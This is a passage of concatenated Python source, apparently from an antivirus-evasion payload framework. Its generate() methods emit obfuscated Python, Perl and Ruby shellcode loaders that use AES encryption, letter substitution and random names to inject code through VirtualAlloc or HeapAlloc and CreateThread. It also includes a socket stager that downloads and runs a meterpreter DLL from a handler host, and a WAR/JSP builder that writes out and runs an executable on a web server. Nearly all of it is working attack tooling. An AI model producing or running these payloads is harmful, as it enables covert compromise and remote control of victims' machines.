payload_code += '\t' * num_ends_required + "my $" + rand_thread + " = $" + rand_cthread + "->Call(0, 0, $%s, 0, 0, 0);\n" % (
ptrName)
payload_code += '\t' * num_ends_required + "$" + rand_waitfor + "->Call($" + rand_thread + ", -1);\n"
payload_code += '}\n' * num_ends_required
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
RandCipherObject = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# socket and shellcode variables that need to be kept global
payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName)
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName)
# build the socket and connect to the handler
payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName)
# receive ALL of the payload .dll data
payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName)
payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName)
payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
# copy the .dll into the allocated memory
payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
# kick the thread off to execute the .dll
payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
# wait for the .dll execution to finish
payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
# Assume HEAP Injection
else:
HeapVar = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the stager
payload_code += '\t' * num_tabs_required + "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (injectMethodName, shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this,
decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace(
'\\\\', '\\') + '\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
RandCipherObject = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
payload_code = "require 'rubygems'\n"
payload_code += "require 'win32/api'\n"
payload_code += "include Win32\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
payloadName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
rand_protect = evasion_helpers.randomString()
protect_out = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I');" + rand_protect + " = API.new('VirtualProtect', 'PIIP', 'I')\n"
payload_code += "%s = \"%s\"\n" %(payloadName, Shellcode)
payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x04)\n"
payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + protect_out + " = " + rand_protect + ".call(" + ptrName + ",(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x20, 0); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += "%s = \"%s\"\n" %(payloadName, Shellcode)
payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n"
payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n"
payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n"
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
# Set up all our variables
var_hexpath = evasion_helpers.randomString()
var_exepath = evasion_helpers.randomString()
var_data = evasion_helpers.randomString()
var_inputstream = evasion_helpers.randomString()
var_outputstream = evasion_helpers.randomString()
var_numbytes = evasion_helpers.randomString()
var_bytearray = evasion_helpers.randomString()
var_bytes = evasion_helpers.randomString()
var_counter = evasion_helpers.randomString()
var_char1 = evasion_helpers.randomString()
var_char2 = evasion_helpers.randomString()
var_comb = evasion_helpers.randomString()
var_exe = evasion_helpers.randomString()
var_hexfile = evasion_helpers.randomString()
var_proc = evasion_helpers.randomString()
var_name = evasion_helpers.randomString()
var_payload = evasion_helpers.randomString()
random_war_name = evasion_helpers.randomString()
# Variables for path to our executable input and war output
ORIGINAL_EXE = self.required_options["ORIGINAL_EXE"][0]
war_file = settings.PAYLOAD_COMPILED_PATH + random_war_name + ".war"
try:
# read in the executable
with open(ORIGINAL_EXE, 'rb') as orig_binary:
raw = orig_binary.read()
txt_exe = hexlify(raw)
txt_payload_file = open(var_hexfile + ".txt", 'wb')
txt_payload_file.write(txt_exe)
txt_payload_file.close()
except IOError:
print(
helpers.color("\n [!] ORIGINAL_EXE file \"" + ORIGINAL_EXE +
"\" not found\n",
warning=True))
return ""
# Set up our JSP files used for triggering the payload within the war file
jsp_payload = "<%@ page import=\"java.io.*\" %>\n"
jsp_payload += "<%\n"
jsp_payload += "String " + var_hexpath + " = application.getRealPath(\"/\") + \"" + var_hexfile + ".txt\";\n"
jsp_payload += "String " + var_exepath + " = System.getProperty(\"java.io.tmpdir\") + \"/" + var_exe + "\";\n"
jsp_payload += "String " + var_data + " = \"\";\n"
jsp_payload += "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jsp_payload += var_exepath + " = " + var_exepath + ".concat(\".exe\");\n"
jsp_payload += "}\n"
jsp_payload += "FileInputStream " + var_inputstream + " = new FileInputStream(" + var_hexpath + ");\n"
jsp_payload += "FileOutputStream " + var_outputstream + " = new FileOutputStream(" + var_exepath + ");\n"
jsp_payload += "int " + var_numbytes + " = " + var_inputstream + ".available();\n"
jsp_payload += "byte " + var_bytearray + "[] = new byte[" + var_numbytes + "];\n"
jsp_payload += var_inputstream + ".read(" + var_bytearray + ");\n"
jsp_payload += var_inputstream + ".close();\n"
jsp_payload += "byte[] " + var_bytes + " = new byte[" + var_numbytes + "/2];\n"
jsp_payload += "for (int " + var_counter + " = 0; " + var_counter + " < " + var_numbytes + "; " + var_counter + " += 2)\n"
jsp_payload += "{\n"
jsp_payload += "char " + var_char1 + " = (char) " + var_bytearray + "[" + var_counter + "];\n"
jsp_payload += "char " + var_char2 + " = (char) " + var_bytearray + "[" + var_counter + " + 1];\n"
jsp_payload += "int " + var_comb + " = Character.digit(" + var_char1 + ", 16) & 0xff;\n"
jsp_payload += var_comb + " <<= 4;\n"
jsp_payload += var_comb + " += Character.digit(" + var_char2 + ", 16) & 0xff;\n"
jsp_payload += var_bytes + "[" + var_counter + "/2] = (byte)" + var_comb + ";\n"
jsp_payload += "}\n"
jsp_payload += var_outputstream + ".write(" + var_bytes + ");\n"
jsp_payload += var_outputstream + ".close();\n"
jsp_payload += "Process " + var_proc + " = Runtime.getRuntime().exec(" + var_exepath + ");\n"
jsp_payload += "%>\n"
# Write out the jsp code to file
with open(var_payload + ".jsp", 'w') as jsp_file_out:
jsp_file_out.write(jsp_payload)
# MANIFEST.MF file contents, and write it out to disk
manifest_file = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
with open("MANIFEST.MF", 'w') as man_file:
man_file.write(manifest_file)
# web.xml file contents
web_xml_contents = "<?xml version=\"1.0\"?>\n"
web_xml_contents += "<!DOCTYPE web-app PUBLIC\n"
web_xml_contents += "\"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN\"\n"
web_xml_contents += "\"http://java.sun.com/dtd/web-app_2_3.dtd\">\n"
web_xml_contents += "<web-app>\n"
web_xml_contents += "<servlet>\n"
web_xml_contents += "<servlet-name>" + var_name + "</servlet-name>\n"
web_xml_contents += "<jsp-file>/" + var_payload + ".jsp</jsp-file>\n"
web_xml_contents += "</servlet>\n"
web_xml_contents += "</web-app>\n"
# Write the web.xml file to disk
with open("web.xml", 'w') as xml_file:
xml_file.write(web_xml_contents)
# Create the directories needed for the war file, and move the needed files into them
os.system("mkdir -p META-INF")
os.system("mkdir -p WEB-INF")
os.system("mv -f web.xml WEB-INF/")
os.system("mv -f MANIFEST.MF META-INF/")
# Make the war file by zipping everything together
